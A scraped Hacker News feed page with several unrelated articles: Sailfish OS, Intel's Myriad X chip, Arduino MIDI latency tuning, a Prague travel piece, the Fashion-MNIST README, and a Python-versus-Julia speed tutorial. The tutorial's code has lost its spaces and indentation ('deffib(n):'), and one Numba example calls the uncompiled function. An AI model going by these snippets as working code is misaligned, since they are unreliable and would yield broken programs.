Quantcast
Channel: Hacker News
Viewing all 25817 articles
Browse latest View live

Sailfish OS – True Independent Mobile OS

$
0
0
Sailfish OS offers a true independent alternative to the existing dominant mobile operating systems.
Partners and users of Sailfish OS can build customized mobile experiences with the content what matters to them the most, without restrictions or breaches of privacy.
Sailfish OS is based on open source and developed by the Finnish mobile company Jolla Ltd. and the Sailfish OS community.

We invite partners, developers and users worldwide to join us building a more open future.

Users

Magical User Experience

We believe that user experience is the key to users’ hearts.

Sailfish OS is smooth and fast to use with effortless swipe gestures, simple navigation, and the market’s smartest way to multitask.

Minimalistic Nordic design and regular software updates are the icing on the cake.

Read more

Partners

Freedom to Customize

With Sailfish OS you are in control, and not locked to the tight rules of the big OSs.

With Sailfish OS’ open source roots, flexible licensing models and continuous development model partners can customize anything from the home screen to the core platform and perfectly integrate the features and content they want and need.

Moreover, Sailfish OS can be enhanced with full Android application compatibility – but only if you choose so.

Read more

Sailfish OS is a people powered platform, built like a classic Linux distribution.

Anyone can join our community, just to discuss all things Sailfish OS and vote for new features, or to develop apps, platform and hardware adaptations through various open source initiatives.

Read more


Intel Announces Movidius Myriad X VPU, Featuring ‘Neural Compute Engine’

$
0
0

Today, Intel subsidiary Movidius is announcing the Movidius Myriad X vision processing unit (VPU), a low-power system-on-chip (SoC) intended for deep learning and AI acceleration in vision-based devices such as drones, smart cameras, and VR/AR headsets. This follows up on last month’s launch of the Myriad 2 powered Movidius Neural Compute Stick. As for the Myriad 2, the Myriad X will coexist alongside its predecessor, which was first announced in 2014. Movidius states that the Myriad X will offer ten times the performance of the Myriad 2 in deep neural network (DNN) inferencing within the same power envelope, while the Myriad 2 will remain a lower performance option.

Under the hood, the Myriad X SoC features what Movidius is calling a Neural Compute Engine, an on-chip DNN accelerator. With it, Movidius states that the Myriad X can achieve over one trillion operations per second (TOPS) of peak DNN inferencing throughput, in the backdrop of the Myriad X’s theoretical 4+ TOPS compute capability.

In addition, the Myriad X has four more C-programmable 128-bit VLIW vector processors and configurable MIPI lanes from the Myriad 2, as well as expanded 2.5 MB on-chip memory and more fixed-function imaging/vision accelerators. Like the ones found in the Myriad 2, the Myriad X’s vector units are proprietary SHAVE (Streaming Hybrid Architecture Vector Engine) processors optimized for computer vision workloads. The Myriad X also supports the latest LPDDR4, with the MA2085 variant equipped with only interfaces to external memory. In an accompanying launch video, Movidius locates the Myriad X functions on a stylized dieshot.

Another new function in the Myriad X is 4K hardware encoding, with 4K at 30 Hz (H.264/H.265) and 60 Hz (M/JPEG) supported. Interface-wise, the Myriad X brings USB 3.1 and PCIe 3.0 support, both new to the Myriad VPU family. All this is done within the same <2W power envelope as the Myriad 2, cited more specifically as within 1W.

Movidius Myriad Family VPUs
  Myriad 2 Myriad X
Vector Processors 12x SHAVE Processors 16x SHAVE Processors
On-chip Accelerators ~20 image/vision processing accelerators 20+ image/vision processing accelerators

Neural Compute Engine (DNN accelerator)

On-chip Memory and Bandwidth 2 MB
(400GB/sec)
2.5 MB
(450GB/sec)
DRAM Configurations 1Gbit LPDDR2 (MA215X)
4Gbit LPDDR3 (MA245X)
No in-package memory (MA2085)
4Gbit LPDDR4 (MA2485)
Key Interfaces 12x MIPI lanes
USB 3
16x MIPI lanes
USB 3.1
PCIe 3.0
Process 28nm HPC/HPM (TSMC) 16nm FFC (TSMC)
Package 6.5mm x 6.5 mm (MA215X)
8mm x 9.5 mm (MA245X)
8.1mm x 8.8mm (MA2085, MA2485)

At a glance, much of the Myriad X’s extra performance at the same Myriad 2 power appears to come from its new 16nm FFC TSMC process node. In shrinking from a 28nm planar process to 16nm FinFET, Movidius was able to invest the power savings into upped clocks as well as more SHAVE processors, accelerators, interfaces, and memory, all in a relatively similar package size. While Intel indeed has its own fabs, Movidius stated that the Myriad X was in development well before Intel acquired Movidius in 2016, and thus 16nm FFC was the node of choice. This 16nm FFC iteration comes after the Myriad 2’s incarnations on 28nm HPM and HPC.

While specifics were not disclosed, the Myriad X VPU comes with an SDK that includes a neural network compiler and “a specialized FLIC framework with a plug-in approach to developing application pipelines.” In any case, like the Myriad 2, the Myriad X will be programmable via the Myriad Development Kit (MDK). At this time, there were no details about the reference kit hardware.

As mentioned earlier, the Myriad 2 will not be replaced by the Myriad X. Last January, the Myriad 2 was described as costing under $10; based on the higher cost FinFET process and additional hardware features, the Myriad X will likely command a higher price for the higher performance.

Update (8/28/17): An Intel representative has given an update stating that 8.1mm x 8.8mm are the correct dimensions for the Myriad X VPUs. The original specifications (8.5mm x 8.7mm) that were given out were incorrect. The press kit photo has been updated.

Optimizing latency of an Arduino MIDI controller

$
0
0

Update: The dhang is now available for preorder, and you can join a workshop to build it yourself!

Feedback from first user testing of the dhang digital hand drum was that the latency was too high. How did we bring it down to a good level?

dhang: A MIDI controller using capacitive touch sensors for triggering. An Arduino board processes the sensor data and sends MIDI notes over USB to a PC or mobile device. A synthesizer on the computer turns the notes into sound.

Testing latency

For an interactive system like this, what matters is the performance experienced by the user. For a MIDI controller that means the end-to-end latency, from hitting the pad until the sound triggered is heard. So this is what we must be able to observe in order to evaluate current performance and the impact of attempted improvements. And to have concrete, objective data to go by, we need to measure it.

My first idea was to use a high-speed camera, using the video image to determine when pad is hit and the audio to detect when sound comes from the computer. However even at 120 FPS, which some modern cameras/smartphones can do, there is 8.33 ms per frame. So to find when pad was hit with higher accuracy (1ms) would require using multiple frames and interpolating the motion between them.

Instead we decided to go with a purely audio-based method:

Test setup for measuring MIDI controller end2end latency using audio recorded with smartphone.

  • The microphone is positioned close to the controller pad and the output speaker
  • The controller pad is tapped with the finger quickly and hard enough to be audible
  • Volume of the output was adjusted to be roughly same level as sound of physically hitting the pad
  • In case the images are useful for understanding the recorded test, video is also recorded
  • The synthesized sound was chosen to be easily distinguished from the thud of the controller pad

To get access to more settings, the open-source OpenCamera Android app was used. Setting a low video bitrate to save space, and enabling macro-mode for focusing close objects easier. For synthesizing sounds from the MIDI signals we use LMMS, a simple but powerful digital music studio.

Then we open the video in Audacity audio editor to analyze the results. Using Effect->Amplify to normalize the audio to -1db makes it easier to see the waveforms. And then we can manually select and label the distance between the starting points of the sounds to get our end-to-end latency.

Raw sound data, data with normalized amplitude and measured distance between the sound of tapping the sensor and the sound coming from speakers.

How good is good enough?

We now know that the latency experienced by our testers was around 137 ms. For reference, when playing a (relatively slow) 4/4 beat at 120 beats per minute, the distance between each 16th notes is 125 ms. In the following soundclip the kickdrum is playing 4/4 and the ‘ping’ all 16 16th notes.

So the latency experienced would offset the sound by more than one 16th note! We can understand that this would make it tricky to play.

For professional level audio, less than <10 ms is a commonly cited as the desired performance, especially for percussion. From Action-Sound Latency: Are Our Tools Fast Enough?

Wessel and Wright suggested that digital musical
instruments should aim for latency less than 10ms [22]

Dahl and Bresin [3] found that in a system
with latency, musicians execute their gestures ahead of the
beat to align the sound with a metronome, and that they
can maintain synchronisation this way up to 55ms latency.

Since the instrument in question is going to be a kit targeted at hobbyists/amateurs, we decided on an initial target of <30ms.

Sources of latency

Latency, like other performance issues, is a compounding problem: Each operation in the chain adds to it. However usually a large portion of the time is spent in a small parts of the system, so an important part of optimization is to locate the areas which matter (or rule out areas that don’t).

For the MIDI controller system in question, a software-centric view looks something like:

A functional view of the system and major components that may contribute to latency. Made with Flowhub

There are also sources of latency outside the software and electronics of the system. The capacitive effect that the sensor relies on will have a non-zero response time, and it takes time for sound played by the speakers to reach our ears. The latter can quickly be come significant; at 4 meters the delay is already over 10 milliseconds.

And at this time, we know what the total latency is, but don’t have information about how it is divided.

With simulation-hardened Arduino firmware

The system tested by users was running the very first hardware and firmware version. It used a an Arduino Uno. Because the Uno lacks native USB, a serial->MIDI bridge process had to run on the PC. Afterwards we developed a new firmware, guided by recorded sensor data and host-based simulation. From the data gathered we also decided to switch to a more sensitive sensor setup. And we switched to Arduino Leonardo with native USB-MIDI.

Latency with new firmware (with 1 sensor) was reduced by 50 ms (35%).

This firmware also logs how long each sensor reading cycle takes. It was under 1 ms for the recorded single-sensor setup. The sensor readings went almost instantly from low to high (1-3 cycles). So if the sensor reading and triggering takes just 3 ms, the remaining 84 ms must be elsewhere in the system!

Low-latency audio, a hard real-time problem

The two other main areas of the system are: the USB/MIDI communication from the Arduino to the PC, and the sound synthesis/playback. USB MIDI should generally be relatively low-latency, and it is a subsystem which we cannot influence so easily – so we focus first on the sound aspects.

Since a PC must be able to do multi-tasking, audio is processed in chunks: a buffer of N samples. This allows some flexibility. However if processing is interruptedfor toolong or too often, the buffer may not be completely filled. The resulting glitch is usually heard as a pop or crackle. The lower latency we want, the smaller the buffer, and the higher chance that something will interrupt for too long. At 96 samples/buffer of 48kHz samplerate, each buffer is just 2 milliseconds long.

With JACK on on Linux

I did the next tests on Linux, since I know it better than Windows. Configuring JACK to 256 samples/buffer, we see that the audio configuration does indeed have a large impact.

Latency reduced to half by configuring Linux with JACK for low-latency audio.

With ASIO4ALL on Windows

But users of the kit are unlikely to use Linux, so a solution that works with Windows is needed (at least). We tried all the different driver options in LMMS, switching to Hydrogen drum machine, as well as attempting to use JACK on Windows. None of these options worked well.
So in the end we tried going with ASIO, using the ASIO4LL replacement drivers. Since ASIO is proprietary LMMS/PortAudio does not support it out-of-the-box. Instead you have to manually replace the PortAudio DLL that comes with LMMS with a custom one 🙁 *nasty*.

With ASIO4ALL we were able to set the buffer size as low as 96 samples, 2 buffers without glitches.

ASIO on Windows achieves very low latencies. Measurement of single sensor.

Completed system

Bringing back the 8 other sensors again adds around 6 ms to the sensor reading, bringing the final latency to around 20ms. There are likely still possibilities for significant improvements, but the target was reached so this will be good enough for now.

A note on jitter

The variation in latency of a audio system is called jitter. Ideally a musical instrument would have a constant latency (no jitter). When a musical instrument has significant amounts of jitter, it will be harder for the player to compensate for the latency.

Measuring the amount of jitter would require some automated tools for the audio analysis, but should otherwise be doable with the same test setup.
The audio pipeline should have practically no variation, but the USB/MIDI communication might be a source of variation. The CapacitiveSensor Arduino library is known to have variation in sensor readout time, depending on the current capacitance of the sensor.

Conclusions

By recording audible taps of the sensor with a smartphone, and analyzing with a standard audio editor, one can measure end-to-end latency in a tactile-to-sound instrument. A combination of tweaking the sensor hardware layout, improving the Arduino firmware, and configuring PC software for low-latency audio was needed to aceive acceptable levels of latency. The first round of improvements brought the latency down from an ‘almost unplayable’ 134 ms to a ‘hobby-friendly’ 20 ms.

Comparison of latency betwen the different configurations tested.

Flattr this!

Prague: The Musical City. Národní – The Blogging Musician

$
0
0
Prague : The Musical City. Národní. The Blogging Musician @ adamharkus.com

Prague : The Musical City. Národní. The Blogging Musician @ adamharkus.com

Národní represents the very essence of Prague.  After the window dressing of Wenceslas Square and Na Příkopě, Národní has no pretensions,  no obvious purpose or audience, and it’s here that you begin to understand the real Prague, warts and all, unashamed and proud.

Národní is Prague.

Starting off in a very business-like manner, Národní  seems grey, and lacking character, it’s wideness and tight cobbles providing ample surface for the locals who start to encroach on the tourist numbers for the first time. To my left is Prague’s version of Tesco’s. Labelled ‘My’.  I strolled in just to have a look around the three-storey department store and to my surprise stumbled across a particularly well-stocked music section. This was the first hint at the whole musical culture in Prague, and the reason behind the title of this series. Back home, you never saw a guitar for sale outside of a dedicated guitar shop, let alone a supermarket. But more than that, the quality of the instruments surpassed most guitar shops back home too. Not just guitars either, we had wind instruments, keyboards,  you name it….. in Tesco’s !?

After the minor culture-shock, I headed over the road to  U medvídků beer hall.  (the letter U featured heavily in most pub names for some reason). As I confidently pushed through the door, I was met by groups of people, all sat around separate tables in deep conversation. It looked more like a brewery than pub, all brass pipework, vessels and solid, natural wood. Again, the standard English procedure of propping up the bar didn’t really work here. I lingered for a moment but the staff were all tending to their seated customers. After an uncomfortable length of time I received my (delicious) large pilsner and reluctantly took up a seat.  If you can’t beat ’em, join ’em. Drinking seemed to be a very close-knit ‘family’ thing here, almost always involving food.  There was none of the fast-paced pub-crawl culture of back home, more a relaxed, unhurried excuse to sit around a table and be sociable with family and friends. It’s such a shame it hasn’t caught on here.

Prague’s Rock Cafe was a real eye-opener.  The last time I visited the place was way back in 2001, but for all intents and purposes it was 1992 inside. Nirvana and grunge music were still in their heyday here, almost ten years behind the rest of the world. But the exuberance of the floppy haired, lumberjack-shirted youth had even more vigour in these darkened, sweaty halls. The atmosphere was underground almost, safely hidden from authority. This was a release of the tensions I so far knew very little about. For me, it was a chance to relive some of the best times of my life, like going back in a time machine, a beautiful feeling, but also with a slightly sour note that something was not quite right about the place, something sinister, oppressive even, as if one wrong move could mean the end in an instant.  Looking past the paying customers, you could see the stark contrast in the battle-hardened, battle-scarred staff.  Stoically, menacingly watching, monitoring every move.  Was there a reason we were ten years out of date? Has culture and media been controlled in some way?  For now I just enjoyed the memories.

Unlike Wenceslas Square , Národní proudly displayed its ‘Dancing Bars’, tobacco and liquor stores for all the world to see. You get the feeling it doesn’t really care about the outside world’s opinion, and with the Tram-lines, layout and location, a sense that it may once have been Prague’s main high-street, but fallen out of favour because the face didn’t fit.

Towards the end of  Národní, the view gets notably more official, regal even, with architecture rivalling Wenceslas square but somehow more authentic and definitely more understated.  The billboards advertise a rogue’s gallery of the greatest classical musical virtuosos in the city, even the world, far in advance of my modest guitar skills. This was the pinnacle. Violin soloists stood out like gladiators with their Stradivarius’s, Jazz musicians with decades of experience between them, producing chords and scales I could only dream about. Even the solo guitarists took it up to another level, big names in the acoustic and flamenco arena, masters of the their instrument, all under the banner, the rubber-stamp of the Musical City.

And yet somehow the adverts seem more like watered down demonstrations, a toe in the water against the system that hopefully slip under the radar. There’s no razzmatazz which would bring the hammer down, no glimpses of personality or character, it’s all about the music, maybe it’s only allowed to be.

The tram terminus, grand government buildings and opera houses frame the first glimpses of the Vltana River, with, on the right corner, the splendidly high-class Cafe Slavia  providing the icing on the cake.  The road widens out to accommodate the patchwork of the intricate tram crossroads, which carries on over the bridge and beyond and opens out to the leafy but still dramatic riverside. Nothing seems forced. From end to end Národní holds your interest and wins your heart like an old-man’s long-sleeve tattoo etched with a lifetime’s worth of laughter, joy and pain.

Thinking back to the Taxi ride here, Národní  had provided me with my first glimpse of the ‘soul’ of Prague and its people. Here, there was no filter, nothing to hide, even a slight tinge of defiance.  I’d began to notice its love for music and expression, even in the face of intolerance, and that feeling lured me in to explore deeper.

An MNIST-like fashion product dataset

$
0
0

README.md

GitHub starsGitterReadme-CN

Fashion-MNIST is a dataset of Zalando's article images—consisting of a training set of 60,000 examples and a test set of 10,000 examples. Each example is a 28x28 grayscale image, associated with a label from 10 classes. We intend Fashion-MNIST to serve as a direct drop-in replacement for the original MNIST dataset for benchmarking machine learning algorithms. It shares the same image size and structure of training and testing splits.

Here's an example how the data looks (each class takes three-rows):

Why we made Fashion-MNIST

The original MNIST dataset contains a lot of handwritten digits. Members of the AI/ML/Data Science community love this dataset and use it as a benchmark to validate their algorithms. In fact, MNIST is often the first dataset researchers try. "If it doesn't work on MNIST, it won't work at all", they said. "Well, if it does work on MNIST, it may still fail on others."

To Serious Machine Learning Researchers

Seriously, we are talking about replacing MNIST. Here are some good reasons:

Get the Data

You can use direct links to download the dataset. The data is stored in the same format as the original MNIST data.

NameContentExamplesSizeLink
train-images-idx3-ubyte.gztraining set images60,00026 MBytesDownload
train-labels-idx1-ubyte.gztraining set labels60,00029 KBytesDownload
t10k-images-idx3-ubyte.gztest set images10,0004.2 MBytesDownload
t10k-labels-idx1-ubyte.gztest set labels10,0005.0 KBytesDownload

Alternatively, you can clone this GitHub repository; the dataset appears under data/fashion. This repo also contains some scripts for benchmark and visualization.

git clone git@github.com:zalandoresearch/fashion-mnist.git

Labels

Each training and test example is assigned to one of the following labels:

LabelDescription
0T-shirt/top
1Trouser
2Pullover
3Dress
4Coat
5Sandal
6Shirt
7Sneaker
8Bag
9Ankle boot

Usage

Loading data with Python (requires NumPy)

Use utils/mnist_reader in this repo:

import mnist_reader
X_train, y_train = mnist_reader.load_mnist('data/fashion', kind='train')
X_test, y_test = mnist_reader.load_mnist('data/fashion', kind='t10k')

Loading data with Tensorflow

from tensorflow.examples.tutorials.mnist import input_data
data = input_data.read_data_sets('data/fashion')

data.train.next_batch(100)

Loading data with other languages

As one of the Machine Learning community's most popular datasets, MNIST has inspired people to implement loaders in many different languages. You can use these loaders with the Fashion-MNIST dataset as well. (Note: may require decompressing first.) To date, we haven't yet tested all of these loaders with Fashion-MNIST.

Benchmark

We built an automatic benchmarking system based on scikit-learn that covers 128 classifiers (but no deep learning) with different parameters. Find the results here.

You can reproduce the results by running benchmark/runner.py. We recommend building and deploying this Dockerfile.

You are welcome to submit your benchmark; simply create a new issue and we'll list your results here. Before doing that, please make sure it does not already appear in this list. Visit our contributor guidelines for additional details.

ClassifierPreprocessingFashion test accuracyMNIST test accuracySubmitterCode
2 Conv Layers with max pooling (Keras)None0.876-Kashif Rasul🔗
2 Conv Layers with max pooling (Tensorflow) >300 epochsNone0.916-Tensorflow's doc🔗
Simple 2 layer convnet <100K parameterNone0.9250.992@hardmaru🔗
GRU+SVMNone0.888-@AFAgarap🔗
GRU+SVM with dropoutNone0.855-@AFAgarap🔗
WRN40-4 8.9M paramsstandard preprocessing (mean/std subtraction/division) and augmentation (random crops/horizontal flips)0.967-@ajbrock🔗🔗
DenseNet-BC 768K paramsstandard preprocessing (mean/std subtraction/division) and augmentation (random crops/horizontal flips)0.954-@ajbrock🔗🔗
MobileNetaugmentation (horizontal flips)0.950-@苏剑林🔗
ResNet18Normalization, random horizontal flip, random vertical flip, random translation, random rotation.0.9490.979Kyriakos Efthymiadis🔗
simple 2-layer conv netNormalization, random horizontal flip, random vertical flip, random translation, random rotation.0.9190.971Kyriakos Efthymiadis🔗

Other Explorations of Fashion-MNIST

Generative adversarial networks (GANs)

Misc.

Visualization

t-SNE on Fashion-MNIST (left) and original MNIST (right)

PCA on Fashion-MNIST (left) and original MNIST (right)

Contributing

Thanks for your interest in contributing! There are many ways to get involved; start with our contributor guidelines and then check these open issues for specific tasks.

Contact

To discuss the dataset, please use Gitter.

Citing Fashion-MNIST

If you use Fashion-MNIST in a scientific publication, we would appreciate references to the following paper:

Fashion-MNIST: a Novel Image Dataset for Benchmarking Machine Learning Algorithms. Han Xiao, Kashif Rasul, Roland Vollgraf. arXiv:1708.07747

Biblatex entry:

@online{xiao2017/online,
  author       = {Han Xiao and Kashif Rasul and Roland Vollgraf},
  title        = {Fashion-MNIST: a Novel Image Dataset for Benchmarking Machine Learning Algorithms},
  date         = {2017-08-28},
  year         = {2017},
  eprintclass  = {cs.LG},
  eprinttype   = {arXiv},
  eprint       = {cs.LG/1708.07747},
}

License

The MIT License (MIT) Copyright © [2017] Zalando SE, https://tech.zalando.com

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

How to Make Python Run as Fast as Julia

$
0
0

Should we ditch Python and other languages in favor of Julia for technical computing?  That's certainly a thought that comes to mind when one looks at the benchmarks on http://julialang.org/.  Python and other high level languages are way behind in term of speed.  The first question that came to my mind was different however: did the Julia team wrote Python benchmarks the best way for Python? 

My take on this kind of cross language comparison is that the benchmarks should be defined by tasks to perform, then have language experts write the best code they can to perform these tasks.  If the code is all written by one language team, then there is a risk that other languages aren't used at best.

One thing the Julia team did right is to publish on github the code they used.  In particular, the Python code can be found here

A first look at this code confirms the bias I was afraid of.  The code is written in a C style with heavy use of loops over arrays and lists.  This is not the best way to use Python.

I won't blame the Julia team, as I have been guilty of the exact same bias.  But I learned the hard lesson: loops on arrays or lists should be avoided at almost any cost as they are really slow in Python, see Python is not C.

Given this bias towards C style, the interesting question (to me at least) is whether we can improve these benchmarks with a better use of Python and its tools? 

Before I give the answer below, let me say that I am in no way trying to downplay Julia.  It is certainly a language worth monitoring as it is further developed and improved.  I just want to have a look at the Python side of things.  Actually, I am using this as an excuse to explore various Python tools that can be used to make code run faster. 

In what follows I use Python 3.5.1 with Anaconda on a Windows machine.  The notebook containing the complete code for all benchmarks below is available on github and on nbviewer.

Comments on various social media make me add this: I am not writing any C code here: if you're not convinced, then try to find any semicolon. All the tools used in this blog run in the standard CPython implementation available in Anaconda or other distributions.  All the code below runs in a single notebook.  I tried to use the Julia micro performance file from github but it does not run as is with Julia 0.4.2.  I had to edit it and replace @timeit by @time to make it run.  I also had to add calls to the timed functions before timing them, otherwise the compilation time was included.  I ran it with the Julia command line interface, on the same machine as the one used to run Python.

Timing Code

The first benchmark Julia team used is a naive coding of the Fibonacci function. 

deffib(n):
ifn<2:
returnn
returnfib(n-1)+fib(n-2)

This function grows rapidly with n, for instance:

fib(100) = 354224848179261915075

Note how Python arbitrary precision comes in handy.  Coding the same in a language like C would some coding effort to avoid integer overflow.  In Julia one would have to use the BigInt type.

All the Julia benchmarks are about running times.  Here are the timings with and without BigInt in Julia

  0.000080 seconds (149 allocations: 10.167 KB)
  0.012717 seconds (262.69 k allocations: 4.342 MB)

One way to get running times in Python notebooks is to use the magic %timeit.  For instance, typing

%timeit fib(20)

in a new cell and executing it outputs

100 loops, best of 3: 3.77 ms per loop

It means that the timer did the following:

  1. Run fib(20) one hundred times, store the total running time
  2. Run fib(20) one hundred times, store the total running time
  3. Run fib(20) one hundred times, store the total running time
  4. Get the smallest running time from the three runs, divide it by 100, and outputs the result as the best running time for fib(20)

The sizes of loops (100  and 3 here) are automatically adjusted by the timer.  They may change depending on how fast the timed code runs.

Python timing compares very favorably against Julia timing when BigInt are used: 3 milliseconds vs 12 milliseconds.  Python is 4 times faster than Julia when arbitrary precision is used. 

However, Python is way slower than Julia's default 64 bits integers.  Let's see how we can force the use of 64 bits integers in Python.

Compiling With Cython

One way to do it is to use the Cython compiler.  This compiler is written in Python.  It can be installed via

pip install Cython

If you use Anaconda, the installation is different.  As it is a bit tricky I wrote a blog entry about it: Installing Cython For Anaconda On Windows

Once installed, we load Cython in the notebook with the %load_ext magic:

%load_ext Cython

We can then compile code in our notebook.  All we have to do is to put all the code we want to compile in one cell, including the required import statements, and start that cell with the cell magic %%cython:

%%cython
deffib_cython(n):
ifn<2:
returnn
returnfib_cython(n-1)+fib_cython(n-2)

Executing that cell compiles the code seamlessly.  We use a slightly different name for our function to reflect that it is compiled with Cython.  Of course, there is no need to do this in general.  We could have replaced the previous function by a compiled function of the same name.

Timing it yields

1000 loops, best of 3: 1.47 ms per loop

Wow, more than 2 times faster than the original Python code!  We are now 9 times faster than Julia with BigInt.

We can also try with static typing.  We declare the function with the keyword cpdef instead of def.  It allows us to type the parameters of the function with their corresponding C types.  Our code becomes.

%%cython
cpdeflongfib_cython_type(longn):
ifn<2:
returnn
returnfib_cython_type(n-1)+fib_cython_type(n-2)

After executing that cell, timing it yields

10000 loops, best of 3: 24.4 µs per loop

Amazing, we're now at 24 micro seconds, about 150 times faster than the original benchmark !   This compares favorably with the 80 microseconds used by Julia.

One can argue that static typing defeats the purpose of Python.  I kind of agree with that in general, and we will see later a way to avoid this without sacrificing performance.  But I don't think this is the issue here.  The Fibonacci function is meant to be called with integers.  What we lose with static typing is the arbitrary precision that Python provides.  In the case of Fibonacci, using the C type long limits the size of the input parameter because too large parameters would result in integer overflow. 

Note that Julia computation is done with 64 bits integers too, hence comparing our statically typed version with that of Julia is fair. 

Caching Computation

We can do better while keeping Python arbitrary precision.  The fib function repeats the same computation many times.  For instance, fib(20) will call fib(19) and fib(18).  In turn, fib(19) will call fib(18) and fib(17).  As a result fib(18) will be called twice.  A little analysis shows that fib(17) will be called 3 times, and fib(16) five times, etc. 

In Python 3, we can avoid these repeated computations using the functools standard library. 

fromfunctoolsimportlru_cacheascache

@cache(maxsize=None)
deffib_cache(n):
ifn<2:
returnn
returnfib_cache(n-1)+fib_cache(n-2)

Timing this function yields:

1000000 loops, best of 3: 127 ns per loop

This is an additional 190 times speedup, and about 30,000 times faster than the original ¨Python code!  I find it impressive given we merely add an annotation to the recursive function.

Note that Julia also can memoize functions, see this example provided by Ismael V.C.

This automated cache isn't available with Python 2.7.  We need to transform the code explicitly in order to avoid duplicate computation in that case.

deffib_seq(n):
ifn<2:
returnn
a,b=1,0
foriinrange(n-1):
a,b=a+b,a
returna

Note that this code makes use of Python ability to simultaneously assign two local variables.  Timing it yields

1000000 loops, best of 3: 1.81 µs per loop

Another 20 times speedup!  Let us compile our function, with and without static typing.  Note how we use the cdef keyword to type local variables.

%%cython

deffib_seq_cython(n):
ifn<2:
returnn
a,b=1,0
foriinrange(n-1):
a,b=a+b,a
returna

cpdeflongfib_seq_cython_type(longn):
ifn<2:
returnn
cdeflonga,b
a,b=1,0
foriinrange(n-1):
a,b=a+b,a
returna

We can time both versions in one cell:

%timeit fib_seq_cython(20)
%timeit fib_seq_cython_type(20)

It yields

1000000 loops, best of 3: 953 ns per loop

10000000 loops, best of 3: 82 ns per loop

We are now at 82 nano seconds with the statically typed code, about 45,000  times faster than the original benchmark! 

If we want to compute the Fibonacci number for arbitrary input, then we should stick to the untyped version, which runs with a respectable 30,000 times  speedup.  Not so bad isn't it?

Compiling With Numba

Let us use another tool called Numba.  It is a just in time (jit) compiler for a subset of Python.  It does not work yet on all of Python, but when it does work it can do marvels. 

Installing it can be cumbersome.  I recommend that you use a Python distribution like Anaconda or a Docker image where Numba is already installed.  Once installed, we import its jit compiler:

fromnumbaimportjit

Using it is very simple.  We only need to add a decoration to the functions we want to compile.  Our code becomes:

@jit
deffib_seq_numba(n):
ifn<2:
returnn
a,b=1,0
foriinrange(n-1):
a,b=a+b,a
returna

Timing it yields

1000000 loops, best of 3: 216 ns per loop

We are faster than the untyped Cython code, and about 17,000 times faster than the original Python code! 

Using Numpy

Let's now look at the second benchmark.  It is an implementation of the quicksort algorithm.  Julia team used that Python code:

defqsort_kernel(a,lo,hi):
i=lo
j=hi
whilei<hi:
pivot=a[(lo+hi)//2]
whilei<=j:
whilea[i]<pivot:
i+=1
whilea[j]>pivot:
j-=1
ifi<=j:
a[i],a[j]=a[j],a[i]
i+=1
j-=1
iflo<j:
qsort_kernel(a,lo,j)
lo=i
j=hi
returna

I wrapped their benchmarking code in a function:

importrandom
defbenchmark_qsort():
lst=[random.random()foriinrange(1,5000)]
qsort_kernel(lst,0,len(lst)-1)

Timing it yields:

100 loops, best of 3: 17.7 ms per loop

The above code is really like C code.  Cython should do well on it.  Besides using Cython and static typing, let us use Numpy arrays instead of lists.  Indeed, Numpy arrays are faster than Python lists when their size is large, say thousands of elements or more. 

Installing Numpy can take a while, I recommend you use Anaconda or a Docker image where the Python scientific stack is already installed. 

When using Cython, we need to import Numpy in the cell to which Cython is applied. Numpy arrays are declared with a special syntax indicating the type of elements of arrays, and the number of dimensions of the array (1D, 2D, etc).  The decorators tell Cython to remove bound checking.

%%cython
importnumpyasnp
importcython

@cython.boundscheck(False)
@cython.wraparound(False)
cdefdouble[:] \
qsort_kernel_cython_numpy_type(double[:]a, \
longlo, \
longhi):
cdef:
longi,j
doublepivot
i=lo
j=hi
whilei<hi:
pivot=a[(lo+hi)//2]
whilei<=j:
whilea[i]<pivot:
i+=1
whilea[j]>pivot:
j-=1
ifi<=j:
a[i],a[j]=a[j],a[i]
i+=1
j-=1
iflo<j:
qsort_kernel_cython_numpy_type(a,lo,j)
lo=i
j=hi
returna

defbenchmark_qsort_numpy_cython():
lst=np.random.rand(5000)
qsort_kernel_cython_numpy_type(lst,0,len(lst)-1)

Timing the benchmark_qsort_numpy_cython() function yields

1000 loops, best of 3: 772 µs per loop

We are about 23 times faster than the original benchmark, but this is still not the best way to use Python.  The best way is to use the Numpy built-in sort() function.  Its default behavior is to use the quick sort algorithm.  Timing this code

defbenchmark_sort_numpy():
lst=np.random.rand(5000)
np.sort(lst)

yields

1000 loops, best of 3: 306 µs per loop

We are now 58 times faster than the original benchmark!  Julia takes 419 micro seconds on that benchmark, hence compiled Python is 40% faster.

I know, some readers will say that I am not comparing apple to apple.  I disagree.  Remember, the task at hand is to sort an input array using the host language in the best possible way.  In this case, the best possible way is to use a built-in function. 

Profiling Code

Let use now look at a third example, computing the Mandelbrot set.  Julia team used this Python code:

defmandel(z):
maxiter=80
c=z
forninrange(maxiter):
ifabs(z)>2:
returnn
z=z*z+c
returnmaxiter

defmandelperf():
r1=np.linspace(-2.0,0.5,26)
r2=np.linspace(-1.0,1.0,21)
return[mandel(complex(r,i))forrinr1foriinr2]
assertsum(mandelperf())==14791

The last line is a sanity check.  Timing the mandelperf() function yields:

100 loops, best of 3: 6.57 ms per loop

Using Cython yields:

100 loops, best of 3: 3.6 ms per loop

Not bad, but we can do better using Numba.  Unfortunately, Numba does not compile list comprehensions yet.  Therefore we cannot apply it to the second function, but we can apply it to the first one.  Our code looks like this.

@jit
defmandel_numba(z):
maxiter=80
c=z
forninrange(maxiter):
ifabs(z)>2:
returnn
z=z*z+c
returnmaxiter

defmandelperf_numba():
r1=np.linspace(-2.0,0.5,26)
r2=np.linspace(-1.0,1.0,21)
    return[mandel(complex(r,i))forrinr1foriinr2]

Timing it yields

1000 loops, best of 3: 481 µs per loop

